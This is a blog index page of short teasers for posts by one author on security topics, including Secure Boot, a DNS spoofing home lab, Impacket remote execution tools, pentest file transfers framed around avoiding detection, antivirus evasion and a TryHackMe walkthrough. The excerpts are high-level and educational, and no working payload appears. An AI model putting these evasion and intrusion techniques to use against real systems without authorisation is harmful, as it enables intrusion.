Digging into the Linux Secure Boot Process

Linux Penguin Introduction This article will begin with a high-level overview of the Ubuntu boot process and will continue to dig deeper into the role of SecureBoot in it when enabled. Some of the concepts I will be covering include shim, EFI variables, and MOKs. The information presented here was aggregated from the sources listed at the bottom of this article. Commands and example output will also be included to help present the topic in a more comprehensive way....

2023-04-29 · 9 min · Ally Petitt

How to Prevent Data Leaks Before they Happen

Data Loss Prevention What is Data Loss Prevention? Data Loss Prevention (DLP) is a strategy for preventing data exfiltration and destruction. Examples of data include financial information, customer data, trade secrets, and other confidential information that could harm a company or its customers if exposed. Common causes of data loss include: Human error- accidental deletion of sensitive files, misconfiguring security settings, or being the victim of a social engineering attack. Insider threats- unauthorized saving and distribution of sensitive files by those with access to corporate systems....

2023-04-23 · 3 min · Ally Petitt

Restoring Files in /usr/include

Hi guys, I made a mistake. In my frustration trying to debug my C program, I inadvertently deleted all the files within my /usr/include folder. I didn’t realize at the time that this was a very important folder! As explained here, it stores the Linux kernel’s libc header files! Rookie mistake, but luckily for us, there’s ways to fix it. If your /usr/include folder is also looking more empty than the shelves during COVID, I come bearing the solution....

2023-04-13 · 2 min · Ally Petitt

How to Create and Deploy Your Own Cloud Server with NextCloud

Why Create a Cloud Server? As many security-conscious people are aware, saving something in the cloud really means saving it on somebody else’s computer. When using cloud services, you don’t own the data that you upload, nor do you own the program that you’re using. Additionally, it is within the cloud service provider’s rights to delete your data or remove your access to it if they had technical issues, went bankrupt, or you missed a bill....

2023-04-09 · 5 min · Ally Petitt

Practical Demonstration: DNS Spoofing + Home Lab

DNS Cache Poisoning on Home Lab Walkthrough https://www.okta.com/sites/default/files/media/image/2021-04/DNSPoisoning.png Overview In this article, I will be walking you through a common method of implementing DNS cache poisoning on a network. I’ll illustrate my process with screenshots, commands, and explanations. You are welcome to follow along and gain hands-on experience with DNS spoofing to further reinforce the knowledge that you already have. Intended Audience This is intended for a more technical audience. If you’re a beginner, I recommend looking for a more comprehensive tutorial to walk you through all the terminology and commands....

2023-03-28 · 5 min · Ally Petitt

How I got my OSCP at 16 years old

Wait, you can do that? The answer is a resounding “yes”. And I’m not the only one who got my OSCP at the age of 16. Meet Mihai, Vanshal, Grant, and this person from Reddit. Admittedly, the number of us is few and far between when compared to the typical demographic of OSCP test-takers. To add to this, I’m a woman and I haven’t seen any other women my age do this....

2023-03-19 · 20 min · Ally Petitt

Windows Remoting: Difference between psexec, wmiexec, atexec, *exec

https://images.pexels.com/photos/3760778/pexels-photo-3760778.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1 If you’re anything like me, you discovered Impacket, either through a course, Ippsec, or your own research, and you look at the scripts. Your grin turns into horror as you realize the sheer amount of scripts that end with “exec”. They all give you remote access but when do you use which one!? Don’t worry, I have your back. Let’s break them down. PsExec PsExec works by writing a randomly-named binary to the ADMIN$ SMB share (hence why you require write access to that share in order to use it)....

2022-12-09 · 4 min · Ally Petitt

VPN Troubleshooting: How to fix “Inactivity Timeout ( — ping-restart)”

If your VPN log looks something like this: I’m here to help. During my time working through the PEN-200 labs, I’ve faced the constant struggle of losing connection to the host every few minutes to seconds. I tried to troubleshoot this “Inactivity Timeout” error with an Offsec employee for 3 hours to no avail. Finally, I figured out the solution and I am here to share it with those of you who have the same struggle....

2022-11-12 · 3 min · Ally Petitt

What the Pen-200 Has Taught Me About Pentesting Methodology

The Pen-200 is the prerequisite course for the OSCP exam. As such, the writeups for the labs are incredibly difficult to find. As someone who has relied heavily on the accessibility of HTB walkthroughs, I’ve never been in an environment where I wasn’t one Google search away from figuring out the next step in solving a box. Needless to say, 0xdf couldn’t help me much with the Pen-200 labs. The Pen-200 labs were a struggle not because I was incompetent, but because I didn’t have enough practice reaching dead ends....

2022-11-02 · 3 min · Ally Petitt

How Did an 18-Year-Old Hack Uber?

An 18-year-old hacker gained admin access to Uber on September 15, 2022. These are the steps that the hacker took: The hacker obtained an Uber employee’s phone number. He directed the employee to a phishing site that looked like an Uber login page. The employee logged in and the hacker gained his credentials. The hacker tried to get around the MFA by doing a Multi-Factor Authentication Fatigue attack. This attack consists of spamming MFA requests to the employee until he gets annoyed enough to allow the login attempt to go through....

2022-09-24 · 3 min · Ally Petitt

How Companies Respond to Cyber Attacks | The 6 Steps of an Incident Response Plan

Introduction This article contains information that I have gathered as I’ve done research on incident response. This aims to be actionable for red teamers to know what to look out for and for blue teamers to aid in the creation of an effective incident response plan. Key Roles the CISO ensures cyberattacks are promptly investigated. coordinating efforts of incident response during a cyberattack. investigating which data may have been stolen....

2022-07-09 · 3 min · Ally Petitt

Pentester’s Guide to Performing File Transfers

Foreword To avoid detection, it is best to use tools that are native to the victim’s computer. FTP with Windows Host While having a shell on the Windows machine, start an FTP server on your host machine. Follow these steps if you don’t already have FTP server installed: sudo apt-get install vsftpd sudo service vsftpd start service vsftpd status #status should be active To check if your server is working, type ftp localhost....

2022-06-08 · 3 min · Ally Petitt

Antivirus Evasion: What it is and How to do it

How Does Antivirus Software Actually Work? Antivirus software acts as a defense from trojans, viruses, ransomware, spyware, adware, and much more. There are 3 main ways that it detects malware: signature-based detection, heuristic-based detection, and anomaly-based detection. Signature-Based Detection The scanner will search for specific strings in a program and check for them in a database of known viruses. The strings are often the payload of the malicious code. If the signatures match, the activity is flagged for suspicious activity....

2022-05-30 · 3 min · Ally Petitt

Kerberos Authentication Explained

When first learning Kerberos, it can feel like you’re being chased by the three-headed dog. Not to fear, however, because today I’ll be explaining a high-level overview of Kerberos authentication. Kerberos was designed to provide secure authentication to services over a potentially insecure network. It is used by many organizations to implement single sign-on (SSO). Kerberos Terminology In order to understand the step-by-step explanation, it is important to have a basic understanding of the various components of Kerberos....

2022-05-25 · 3 min · Ally Petitt

Mustacchio Walkthrough | Try Hack Me | Ally Petitt

Introduction Hey everyone! This is a write-up of how I was able to pwn the Mustacchio machine. I hope you enjoy! Notes: This was done on a Kali Linux machine so the commands might be slightly different if you are on Windows Enumeration To begin, I scanned for open ports using RustScan. RustScan, for those who have never heard of it, is essentially a much faster version of Nmap. You can use Nmap if you prefer....

2022-02-18 · 6 min · Ally Petitt